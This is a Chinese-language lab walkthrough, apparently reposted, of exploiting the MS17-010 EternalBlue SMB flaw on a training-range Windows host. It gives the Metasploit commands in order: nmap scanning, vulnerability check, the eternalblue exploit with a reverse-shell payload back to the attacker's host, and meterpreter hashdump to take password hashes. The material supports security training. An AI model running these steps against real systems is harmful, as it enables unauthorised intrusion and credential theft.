MS17-010遠程溢出漏洞(CVE-2017-0143)拿權限


0x00
我這邊用的是安界網的靶場
http://vnc.ajsafe.com/experi/article/164.html
首先來開啟靶場
關於漏洞的介紹:MS17-010漏洞出現在Windows SMB v1中的內核態函數srv!SrvOs2FeaListToNt在處理FEA(File Extended Attributes)轉換時,在大非分頁池(Large Non-Paged Kernel Pool)上存在緩沖區溢出。 函數srv!SrvOs2FeaListToNt在將FEA list轉換成NTFEA(Windows NT FEA) list前會調用srv!SrvOs2FeaListSizeToNt去計算轉換后的FEA lsit的大小,因計算大小錯誤,而導致緩沖區溢出。
0x01漏洞掃描
首先我們來ping一下目標靶機

可以看到是成功的
在來看一下目標機開發的端口
利用工具nmap命令如下

nmap -sV -Pn 192.168.0.2
一定要記住Linux需要區分大小寫

可以看到開放了 135 139 445 端口
我們使用掃描模塊看該漏洞是否可以利用命令如下
msfconsole

這邊可以看到是可以利用的
打開 metasploite 命令行客戶端,使用search命令查找ms17-010漏洞的相關模塊
search ms17-010

使用use命令選擇我們要使用的掃描模塊
use auxiliary/scanner/smb/smb_ms17_010

需要設置目標地址,設置命令:
set RHOSTS 192.168.0.2

然后直接run或者exploit 兩個命令意思相同執行結果一樣

我這邊是直接run
0x02漏洞利用
從上一步驟可以看出,該漏洞是可被利用的,接下來,我們使用漏洞利用模塊
use exploit/windows/smb/ms17_010_eternalblue

查看配置信息,並設置標記為yes的屬性
show options

目標機host地址:192.168.0.2
set RHOSTS 192.168.0.2
之后,選擇載荷payload,也就是shellcode,此處我們選擇回連至控制端shell的payload

配置中缺少本地主機 LHOST,設置一下
set LHOST 192.168.0.3
本地端口LPORT默認為4444,可通過set LPORT 端口號修改
完成配置后,運行exploit或者run,開始執行漏洞利用模塊

0x04遠程登錄目標機
我們已經成功的獲取Session會話了,本次我們繼續介紹meterpreter后滲透模塊的其他功能
運行sysinfo查看目標機器相關信息
sysinfo

中文亂碼問題不打緊不打緊
執行help命令可以幫助我們了解meterpreter有哪些功能
help

接下來,我們獲取目標機hash值
執行hashdump
hashdump

ok了本次內容就到這里希望大家也去練習練習


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM